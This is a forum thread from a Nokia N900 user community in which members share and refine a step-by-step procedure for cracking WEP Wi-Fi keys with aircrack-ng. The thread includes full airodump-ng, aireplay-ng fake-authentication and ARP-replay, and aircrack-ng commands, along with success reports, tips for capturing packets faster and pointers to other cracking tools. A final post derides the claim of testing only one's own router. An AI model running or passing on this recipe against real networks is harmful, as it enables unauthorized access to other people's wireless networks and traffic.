Notices


Reply
Thread Tools
Posts: 22 | Thanked: 3 times | Joined on Jun 2010
#61
I want it! Updates pleeeaaase!!
 
Ele-Mental's Avatar
Posts: 154 | Thanked: 81 times | Joined on Oct 2010 @ South Africa
#62
Originally Posted by q6600 View Post
hi this will work only if a client is conected on the network.
your bluethoot must be off
1- nokia n900 with prm 1.2
2-update your krenel to power krenel from dl sistem ( reboot )
2-instll aircrack-ng
3-install rootsh
4- oper xterminal type root and enter
5-airodump-ng wlan0 ( put on a paper bssid, station and chanel ) when you have this presc ctr+c
6-in the same window
airodump-ng -w wep -c [channel number] --bssid [bssid number] [wireless card name]
7-open a new xterminal windo type root and enter
8-aireplay-ng -1 0 -a [bssid] [wireless card name]
9-open the 3 rd windo type root and enter
aireplay-ng -3 -b [bssid] [wireless card name]
10- go on window 1 and wait til you got 50.000 data pack
11-when you have 50.000 data pack prec ctr+c ( in all windows)
12-go on 3 rd window and type
cd /root
ls
and now looke for a file with .cap (ezxtention .cap)
13-aircrack-ng [filename].cap and you will have your wep key
14- if you need space in root delete the.cap files.
cd /root
rm (name of the file)
example rm wep-01.cap
please note that is ilegale to crack wep keys ( play wit your roouter )
let me know if you manage to do it.

This worked! Key Found! Decrypted correctly: 100% I was sooo surprised to see my key there. Thanx man!
__________________
N900:
PR1.3 @ 1.15Ghz
Gingerbread
Debian
 

The Following User Says Thank You to Ele-Mental For This Useful Post:
Posts: 309 | Thanked: 115 times | Joined on May 2010 @ Malaysia
#63
u can actually decrypt any WEP key (client/non-client) with neopwn..

i have successfully installed, run, and decrypt WEPs with neopwn and GrimWepa..

thx to some users who helped..especially OptX, xopher and badfusion..
 
Ele-Mental's Avatar
Posts: 154 | Thanked: 81 times | Joined on Oct 2010 @ South Africa
#64
Ok so everything works. Now im trying to understand every aspect of what is happening. I understand every command, but step 8 and 9. what does "-1 0" and "-3" stand for?
__________________
N900:
PR1.3 @ 1.15Ghz
Gingerbread
Debian
 
kamiwey's Avatar
Posts: 121 | Thanked: 100 times | Joined on Jun 2010
#65
Originally Posted by Ele-Mental View Post
Ok so everything works. Now im trying to understand every aspect of what is happening. I understand every command, but step 8 and 9. what does "-1 0" and "-3" stand for?
hello, the -1 and -3 is to set the kind of atack whit aireplay
__________________
i hate my N900 because nokia support, but i love my N900 because this comunity
 

The Following 2 Users Say Thank You to kamiwey For This Useful Post:
Posts: 133 | Thanked: 16 times | Joined on Sep 2010 @ Balzan Malta
#66
Hello. I do not know where to get neopwn from. I read that it is going to be in beta soon but you already used it. Can you tell me the download link please?
 
Ele-Mental's Avatar
Posts: 154 | Thanked: 81 times | Joined on Oct 2010 @ South Africa
#67
Originally Posted by kamiwey View Post
hello, the -1 and -3 is to set the kind of atack whit aireplay
Please correct me if i am wrong, but that basically means im doing a fake authentication, deauthentication and ARP request replay attack?
__________________
N900:
PR1.3 @ 1.15Ghz
Gingerbread
Debian
 
Posts: 75 | Thanked: 17 times | Joined on Aug 2010 @ under the sky
#68
method works great!

some tips:
the "station" is not used at all.
copy paste the required parameters into a notepad or something like leafpad and copy paste when requested (this will avoid mistakes)
you need to run 3 commands the second command finish in 10 seconds so it is normal.
your key will be something like xx:xx:xx:xx:xx so simply remove the : to get the key.
u will get 2 cap files wep-xx and reply-xx... u need the wep-xx.cap
the cap file might be in the same folder u run the commands on and not the root.
leave it for at least 40 mins to collect packets, am not a pro and seriously i don't know what are those readings so just leave it for sometime, my first trial failed coz i gave it 15 mins only.
use it during busy time of the day, don't wait till the end of midnight where no people r using, remember this method is based on packet sniffing.
your n900 will heat up so be careful and use battery cable as it will drain battery in less than an hour.
start testing on your own secured WEP router first, when it works the first time you will gain confidence

good luck n900s! say thanks
 
Posts: 75 | Thanked: 17 times | Joined on Aug 2010 @ under the sky
#69
can someone be find enough to translate this page and improve where possible: http://www.phonesfera.com/tutorial-w...312.html#p7312
 
Captwheeto's Avatar
Posts: 302 | Thanked: 193 times | Joined on Oct 2008 @ England
#70
Originally Posted by TDSii View Post
start testing on your own secured WEP router first, when it works the first time you will gain confidence
Testing what? A vulnerability that is nine years old? THERE IS NOTHING TO TEST. None of you are fooling anyone with your 'making sure my network is secure herp derp'. It should be common knowledge by now that WEP is deprecated as a security measure. Just own up to being dirty little skids
 

The Following 2 Users Say Thank You to Captwheeto For This Useful Post:
Reply


 
Forum Jump


All times are GMT. The time now is 21:41.